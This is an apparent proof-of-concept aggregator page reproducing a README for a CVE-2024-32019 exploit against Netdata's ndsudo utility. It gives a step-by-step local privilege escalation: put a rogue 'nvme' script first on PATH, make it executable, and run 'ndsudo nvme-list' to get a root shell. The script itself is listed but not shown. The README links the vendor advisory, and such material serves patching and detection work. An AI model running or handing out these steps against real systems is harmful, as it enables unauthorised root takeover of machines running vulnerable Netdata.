关联漏洞
描述
This is an alternative poc for the CVE-2024-32019 written in python
介绍
# Privilege Escalation via `ndsudo` (Netdata Local Exploit)
This is an alternative POC to exploit a vulnerable `ndsudo` utility bundled with Netdata to perform a local privilege escalation.
The exploit works by adding the script inside the user’s `PATH` substituting an allowed command (`nvme`) by `ndsudo` and execute it as root.
---
## Prerequisites & Assumptions :scroll:
- **Local shell access** on the target system.
- Python3 on the target machine
- Possibilty to execute the `ndsudo` command.
---
## Steps
### 1. Script :hammer:
You can either create or upload the script directly to the target machine as long as it's called as one of the allowed commands.
To check the allowed commands by `ndsudo` just launch `ndsudo --help`.
For this poc we'll use the command `nvme-list`, so the script will be called `nvme`.
---
### 2. PATH injection :syringe:
Once the script has been created and named after an allowed command by `ndsudo` we need to inject it at the beginning of the `PATH` variable so it will be the first one to be found and executed
```bash
export PATH="/tmp/nvme:$PATH"
```
---
### 3. Execution permissions :gun:
Obviusly the script needs to have execution permissions
```bash
chmod +x /tmp/nvme
```
---
### 4. Trigger the Exploit :boom:
Once everything is set up, just launch `ndsudo` with the rogue script and you're root.
```bash
ndsudo nvme-list
```
---
## Resources :books:
- Netdata Github Advisory: https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93
Hack responsibly :skull:
文件快照
[4.0K] /data/pocs/84021d6b52c63c90e7568320e8b017b1a9a8bc6c
├── [ 76] poc.py
└── [1.5K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。